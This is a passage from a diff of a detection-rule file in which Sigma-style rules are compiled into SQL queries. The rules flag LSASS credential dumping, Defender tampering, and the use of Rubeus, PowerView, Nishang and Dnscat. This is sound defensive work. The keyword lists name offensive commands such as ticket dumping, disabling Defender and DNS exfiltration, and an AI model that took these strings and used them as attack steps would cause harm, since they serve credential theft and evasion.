'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE 